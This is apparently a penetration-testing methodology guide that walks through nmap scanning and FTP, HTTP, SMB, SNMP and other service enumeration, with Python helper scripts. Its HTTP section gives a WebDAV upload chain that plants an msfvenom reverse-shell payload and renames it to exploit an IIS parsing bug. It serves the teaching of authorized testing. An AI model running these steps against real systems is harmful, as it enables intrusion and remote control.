
Pentest Methodology


Port and Vulnerability Scanning

These are the nmap commands I usually use. I use an intensive all-port TCP nmap scan in order to find everything. I also use a UDP scan. UDP is really slow, so I only search the top ports. I also sometimes use a nmap scan loaded with vulnerability-finding scripts, but it can create some problems if the target is running any weak services.

# Nmap Depth Scan (all 65535 TCP ports; -sS needs root, and -A already implies -sC)
nmap -vv -Pn -A -sC -sS <IP ADDRESS> -p-

# Nmap Vuln Scan
#  Use this nmap scan with caution. It can possibly take down weak services.
#  Quote the glob, otherwise the shell expands it against files in the current directory.
nmap -Pn --script "*vuln*" --script-args=unsafe=1 <IP ADDRESS> -p <PORTS>

# Nmap UDP Scan (-sU needs root; --top-ports takes a count, 100 here is a starting point)
nmap -vv -Pn -A -sC -sU -T4 <IP ADDRESS> --top-ports 100
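The all-port scan produces far more output than the intensive -A/-sC pass needs, and a common refinement is to pull the open ports out of nmap's grepable output (-oG) and run the deep scan on just those. The script below is an added example written for this page, not tooling from the original methodology: it parses a constructed -oG sample (SAMPLE is made up to look like real scan output), keeps only ports in state open, and prints a targeted follow-up command per host. The file name allports.gnmap is an assumption.

```python
"""Extract open ports from nmap grepable (-oG) output and build a targeted
follow-up command per host.

Added example; assumes the all-port scan was saved with:
    nmap -Pn -sS -p- -oG allports.gnmap <IP ADDRESS>
SAMPLE below is constructed to look like that file; it is not real scan data.
"""
import re
import sys

# Constructed sample of -oG output for two hosts (not a real scan).
SAMPLE = """# Nmap 7.91 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -Pn -sS -p- -oG allports.gnmap 10.10.10.0/30
Host: 10.10.10.1 ()\tStatus: Up
Host: 10.10.10.1 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 8080/open/tcp//http-proxy///, 161/open|filtered/udp//snmp///\tIgnored State: closed (65531)
Host: 10.10.10.2 ()\tStatus: Up
Host: 10.10.10.2 ()\tPorts: 21/open/tcp//ftp///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (65531)
# Nmap done at Mon Jan  1 00:05:00 2024 -- 4 IP addresses (2 hosts up) scanned in 300.00 seconds
"""

# One -oG port entry is port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/([\w|]+)/(tcp|udp)/[^/]*/([^/]*)/")


def parse_gnmap(text):
    """Return {ip: [(port, proto, service), ...]} keeping only state 'open'.

    open|filtered (typical for UDP) and filtered are dropped on purpose: they
    are not confirmed open and would only slow the intensive scan down."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ip = line.split()[1]
        for port, state, proto, service in PORT_RE.findall(line.split("Ports:", 1)[1]):
            if state == "open":
                hosts.setdefault(ip, []).append((int(port), proto, service))
    return hosts


def followup_scan_cmd(ip, entries):
    """Intensive scan limited to one host's confirmed-open TCP ports (None if none)."""
    tcp = sorted(p for p, proto, _ in entries if proto == "tcp")
    if not tcp:
        return None
    return "nmap -vv -Pn -A -sC -sS -p %s %s" % (",".join(str(p) for p in tcp), ip)


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    for ip, entries in parse_gnmap(text).items():
        print(ip, ", ".join("%d/%s %s" % e for e in entries))
        cmd = followup_scan_cmd(ip, entries)
        if cmd:
            print("  ->", cmd)
```

Run it with the real file as the first argument (or with no argument to see the constructed sample). UDP results are deliberately kept out of the follow-up command, since -sS on a UDP port is meaningless; handle them with the UDP scan above.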

Enumerating

Always check everything very closely and go through each port one by one. Sometimes ports are tricky, especially HTTP ports. One way to check a port that you're unsure about is to use curl. Curl is normally used for HTTP, but it can be pointed at any port: it sends an HTTP request, and with -v it shows whatever the service replies, whether that is an HTTP response, a plain-text banner or a protocol error. It's particularly helpful for finding odd HTTP ports quickly.

Search everything that you encounter: programs and their version numbers. Use either searchsploit or a Google search restricted with site:exploit-db.com/exploits/

# -v prints the request sent and the raw reply, which is what identifies a non-HTTP service
curl -v <IP ADDRESS>:<PORT>
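Doing the same check in code shows what the curl trick is really doing: connect, send an HTTP request, and look at the first bytes that come back. The probe below is an added example for this page, not the author's tooling. It first waits briefly for a server greeting, because SSH, FTP and SMTP speak first, and only then sends an HTTP request; the reply is classified by its leading bytes. The BANNERS prefixes are the standard protocol greetings and are a starting point, not a fingerprint database.

```python
"""Probe a port the way the curl trick does, but over raw sockets so the reply
is visible as bytes even when it is not HTTP. Added example, standard library only.
"""
import socket
import sys

HTTP_PROBE = b"GET / HTTP/1.0\r\nHost: probe\r\n\r\n"

# Leading bytes of well-known greetings/replies (from the protocols' RFCs);
# a starting point, not a fingerprint database.
BANNERS = [
    (b"HTTP/", "http"),
    (b"SSH-", "ssh"),
    (b"220 ", "ftp-or-smtp"),   # both greet with 220; the text after it usually says which
    (b"+OK", "pop3"),
    (b"* OK", "imap"),
    (b"RFB ", "vnc"),
]


def classify(reply: bytes) -> str:
    """Name the protocol from the first bytes a service sent back."""
    if not reply:
        return "silent"                   # no greeting and no answer to HTTP (or a timeout)
    for prefix, label in BANNERS:
        if reply.startswith(prefix):
            return label
    low = reply.lower()
    if b"<html" in low or b"<!doctype" in low:
        return "http-0.9"                 # body with no status line, still a web server
    return "unknown"


def probe(host: str, port: int, timeout: float = 3.0) -> bytes:
    """Connect and wait for a greeting; if none comes, send an HTTP request and read the reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        data = b""
        try:
            data = s.recv(1024)           # banner services (SSH, FTP, SMTP) talk first
        except OSError:                   # timeout or reset: nothing volunteered
            pass
        if not data:                      # HTTP-style services wait for the client
            try:
                s.sendall(HTTP_PROBE)
                data = s.recv(4096)
            except OSError:
                pass
        return data


if __name__ == "__main__":
    host, port = sys.argv[1], int(sys.argv[2])
    reply = probe(host, port)
    print("%s:%d -> %s" % (host, port, classify(reply)))
    print(reply[:200])
```

A "silent" result still tells you something: a service that neither greets nor answers HTTP is often a binary protocol (RDP, MySQL after the handshake, custom agents), which is exactly the case where an nmap -sV probe or a protocol-specific client is the next step.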

Another important thing to do is to take advantage of nmap NSE scripts. If you suspect your target is vulnerable to something, check whether there's an Nmap script for it; nmap --script-help <SCRIPT NAME> prints what a script does and which arguments it takes.

#Finding nmap scripts (quote the glob so the shell does not expand it first)
locate '*.nse'

FTP - 21

First step when finding an FTP server is to check for anonymous login. If anonymous login works, what can you do with it?

  • Does the FTP server have a wwwroot directory? Is it possible to upload into this directory?

  • Does the FTP root expose the whole filesystem (arbitrary file access)? What information can you find?

    • What is the OS version?
    • What information can you find about other services?
    • Can you find any passwords?
# The following are file locations that display OS information
# Windows XP
C:\Windows\System32\eula.txt

# Windows 7
C:\Windows\System32\license.rtf

# Linux (os-release is the current standard; lsb-release and issue.net are older but still common)
cat /etc/os-release
cat /etc/lsb-release
cat /etc/issue.net

# Debian
cat /etc/debian_version

# Red Hat
cat /etc/redhat-release

Nmap has a number of NSE scripts that may be helpful for enumerating FTP (anonymous login, bounce, version-specific checks).

nmap -vv -Pn --script "ftp*" <IP ADDRESS> -p 21
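The checklist above as an added example that is not part of the original page: log in anonymously with Python's ftplib and, if the FTP root turns out to be the filesystem root, fetch the OS-identifying files just listed and parse the KEY=VALUE ones. The OS_FILES table mirrors the list on this page (plus /etc/os-release); the target host is whatever you pass on the command line.

```python
"""Anonymous FTP check plus OS fingerprint via the files listed above.
Added example using only the standard library; OS_FILES mirrors the list on
this page (plus /etc/os-release), the target host comes from the command line.
"""
import io
import sys
from ftplib import FTP, error_perm, error_temp

# Path -> OS family it hints at. Windows paths are written FTP-style; the
# server maps them onto C:\ if its root really is the drive root.
OS_FILES = {
    "/etc/os-release": "linux",
    "/etc/lsb-release": "linux",
    "/etc/issue.net": "linux",
    "/etc/debian_version": "debian",
    "/etc/redhat-release": "redhat",
    "/Windows/System32/license.rtf": "windows7",
    "/Windows/System32/eula.txt": "windowsxp",
}


def parse_release(text):
    """KEY=VALUE release files (os-release, lsb-release) become a dict; lines
    without '=' (issue.net, debian_version, RTF noise) are collected under 'RAW'."""
    info = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            info[key.strip()] = value.strip().strip('"')
        else:
            info.setdefault("RAW", []).append(line)
    return info


def anonymous_login(host, port=21, timeout=10):
    """Return a logged-in FTP object, or None if anonymous is refused."""
    ftp = FTP(timeout=timeout)
    ftp.connect(host, port)
    try:
        ftp.login()          # ftplib's defaults: user 'anonymous', password 'anonymous@'
    except error_perm as exc:
        print("anonymous login refused:", exc)
        ftp.close()
        return None
    return ftp


def grab(ftp, path):
    """Download one file as text, or None if the server refuses or it does not exist."""
    buf = io.BytesIO()
    try:
        ftp.retrbinary("RETR " + path, buf.write)
    except (error_perm, error_temp):
        return None
    return buf.getvalue().decode("utf-8", "replace")


def fingerprint(ftp):
    """Try every path in OS_FILES; return {path: (family, parsed_contents)} for hits."""
    found = {}
    for path, family in OS_FILES.items():
        text = grab(ftp, path)
        if text is not None:
            found[path] = (family, parse_release(text))
    return found


if __name__ == "__main__":
    ftp = anonymous_login(sys.argv[1])
    if ftp:
        print(ftp.getwelcome())
        try:
            print("root listing:", ftp.nlst("/"))   # more than an FTP jail?
        except (error_perm, error_temp) as exc:
            print("listing refused:", exc)
        for path, (family, info) in fingerprint(ftp).items():
            print(path, "->", family, info)
        ftp.quit()
```

A hit on any of these paths is the "arbitrary file access" case from the list above; the same grab() call then works for /etc/passwd, web config files or anything else readable by the FTP service account.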

HTTP - 80, 8000, 8080

Make sure to nikto scan every single HTTP port that nmap finds. Ports 80, 8000 and 8080 are well-known HTTP ports, but HTTP also shows up on less common ports. The curl trick mentioned above works well in these situations.

#Basic nikto scan (port 80 by default, or give the port with -p)
nikto -h <IP ADDRESS>
nikto -h <IP ADDRESS> -p <PORT>

#Scan all CGI directories
nikto -C all -h <IP ADDRESS>
nikto -C all -h <IP ADDRESS> -p <PORT>

After using Nikto, check all the output carefully. DON'T JUST RELY ON NIKTO. Take the manual approach as well; this includes reading the source of web pages for possible information.

  • Does the source mention anything about a program? Does the source contain any version numbers?
  • What language is the server running? PHP? ASP? Etc.
    • This is important for uploading or knowing vulnerabilities
      • For example, say you found a host running FTP and HTTP servers, and you discover that you can upload through FTP into a directory the web server serves. For the server to execute that file rather than just hand it back, it has to have an extension the server passes to its interpreter (.php on a PHP host, .asp/.aspx on IIS), so the language tells you which payload to generate.
  • What filetypes does the server allow for uploading?
    • Perhaps you can take advantage of this by generating a payload with a specific format.
msfvenom --help-formats
Executable formats
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

If you come across a login page, try basic default credentials first (admin/admin, admin/password and the like). If that fails, Google the default credentials for the application and version.

If you come across a web application admin console, try to exploit it.

  • Does the web application allow uploading?
    • It allows uploading but it won't accept my file type?
      • Try checking to see if it uploads it anyway but into a temp folder.
      • Is there a way to bypass the file check?
      • Try seeing if you can upload a malicious file in a type it does accept.
      • I uploaded my file but I don't know how to access it?
        • Did you try seeing if you could traverse directories?
        • Perhaps you can use an LFI to reach the file.
  • Does the website use WebDAV?
    • Can you upload into it?
    • Try cadaver.

First check how WebDAV behaves on the server version in front of you; uploading may need a specific trick. For example, generate an msfvenom reverse shell in asp format but name it evil.txt, so an upload filter that only accepts harmless extensions lets it through. After uploading it with curl -T evil.txt http://<IP ADDRESS>/, use cadaver http://<IP ADDRESS>/ to copy (or move) the file to evil.asp;.txt. On a server with the classic IIS 6.0 semicolon parsing bug, everything after the ; is ignored when the request is mapped to a handler, so the file runs as ASP even though its name ends in .txt. Start a listener for the payload (exploit/multi/handler with the same payload, LHOST and LPORT) before browsing to it. The full process:

# ASP reverse shell, named .txt to get past an extension filter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP ADDRESS> LPORT=443 -f asp > evil.txt
# PUT it through WebDAV
curl -T evil.txt http://<IP ADDRESS>/
# Rename it so the server executes it; cadaver's copy and move both work here
cadaver http://<IP ADDRESS>/
dav:/> copy evil.txt evil.asp;.txt

Then you execute the payload by visiting the file (browser or curl); the handler should catch the connection back.
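The same upload-and-rename sequence as an added example in Python (not the page's own tooling, which is curl and cadaver): an OPTIONS request first, to confirm PUT and MOVE/COPY are actually advertised, then PUT the .txt and MOVE it to the executable name. It assumes the DAV root is / and the evil.asp;.txt rename trick described above; host, port and file names are parameters.

```python
"""WebDAV upload-then-rename with http.client, preceded by an OPTIONS check.
Added example; assumes the DAV root is '/' and the evil.asp;.txt rename trick.
"""
import http.client
import sys


def parse_allow(header_value):
    """'OPTIONS, TRACE, GET, PUT, MOVE' -> {'OPTIONS', 'TRACE', 'GET', 'PUT', 'MOVE'}."""
    if not header_value:
        return set()
    return {m.strip().upper() for m in header_value.split(",") if m.strip()}


def dav_writable(methods):
    """Upload needs PUT; the rename trick additionally needs MOVE or COPY."""
    return "PUT" in methods and bool({"MOVE", "COPY"} & methods)


def destination_url(host, port, remote_name):
    """MOVE/COPY take an absolute URI in the Destination header."""
    return "http://%s:%d/%s" % (host, port, remote_name)


def dav_methods(host, port=80, path="/"):
    """Ask the server which methods it allows on path (the Allow header of OPTIONS)."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("OPTIONS", path)
    resp = conn.getresponse()
    resp.read()
    allow = parse_allow(resp.getheader("Allow"))
    conn.close()
    return allow


def upload_and_rename(host, port, local_file, remote_tmp, remote_final):
    """PUT local_file as remote_tmp (e.g. evil.txt, to pass an extension filter),
    then MOVE it to remote_final (e.g. 'evil.asp;.txt'). Returns the final URL."""
    with open(local_file, "rb") as fh:
        body = fh.read()
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("PUT", "/" + remote_tmp, body=body,
                 headers={"Content-Type": "text/plain"})
    resp = conn.getresponse()
    resp.read()
    if resp.status not in (200, 201, 204):
        raise RuntimeError("PUT failed: %d %s" % (resp.status, resp.reason))
    dest = destination_url(host, port, remote_final)
    conn.request("MOVE", "/" + remote_tmp,
                 headers={"Destination": dest, "Overwrite": "T"})
    resp = conn.getresponse()
    resp.read()
    if resp.status not in (200, 201, 204):
        raise RuntimeError("MOVE failed: %d %s" % (resp.status, resp.reason))
    conn.close()
    return dest


if __name__ == "__main__":
    host = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    allowed = dav_methods(host, port)
    print("Allow:", " ".join(sorted(allowed)))
    if not dav_writable(allowed):
        sys.exit("no PUT plus MOVE/COPY advertised; Allow headers can lie, so still try cadaver")
    print("uploaded to", upload_and_rename(host, port, "evil.txt", "evil.txt", "evil.asp;.txt"))
```

The OPTIONS pre-check is the part worth keeping even when you do the upload with cadaver: a server that advertises PUT but not MOVE/COPY needs a different trick (upload straight to the final name, or use PROPPATCH tricks), and knowing that before you start saves a lot of guessing.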

SMB - 139, 445

SMB can release a ton of information if used correctly. The first step when finding an SMB host is to run enum4linux, which can report the OS version, users, groups, the password policy and any open shares.

enum4linux -a <IP ADDRESS>

If a share is found you can view it with smbclient. Navigating through SMB shares is similar to FTP, and they can share similar weaknesses, such as a share that exposes far more of the filesystem than intended.

#To list shares (-N tries a null session so there is no password prompt)
smbclient -L <IP ADDRESS> -N

#To access shares
smbclient '//<IP ADDRESS>/<SHARE NAME>' -N

Sometimes it's best to mount shares for easy viewing. A nice trick for fast mounting is opening the share in gedit: it goes through GVFS, which mounts the share for you.

#It's weird, yes. But it's fast and works
gedit smb://<IP ADDRESS>/

After mounting it's then possible to view everything easily, including in the file manager's GUI for easier sorting.

SNMP - UDP 161

If UDP 161 came back open (or open|filtered) in the UDP nmap scan, enumerate SNMP with onesixtyone and snmp-check. Both default to the community string public; a non-default string that still answers is a finding in itself.

#Tries community strings (default 'public', or a wordlist with -c) and prints sysDescr, which includes the OS version
onesixtyone <IP ADDRESS>

#Walks the tree with the given community and reveals everything about a server: OS version, users, processes, hotfixes, shares, etc.
snmp-check <IP ADDRESS> -c public

Email - 25, 110/995 or 143/993

These can be good sources for finding users or passwords. SMTP may answer VRFY and EXPN (or reject RCPT TO for unknown recipients), which confirms usernames; POP3 and IMAP are worth a login attempt with any credential you have found so far. Don't neglect these ports.

SSH - 22

It's uncommon to find a vulnerability in SSH itself, but there are a few. One well-known example is the Debian OpenSSL weak-key bug (CVE-2008-0166): keys generated on affected Debian systems come from a tiny keyspace, so the private key matching an authorized public key can be found by brute force.

TFTP - UDP 69

Treat this as you would FTP, with one difference: TFTP has no authentication and no directory listing, so you have to guess filenames (tftp <IP ADDRESS>, then get <FILENAME>).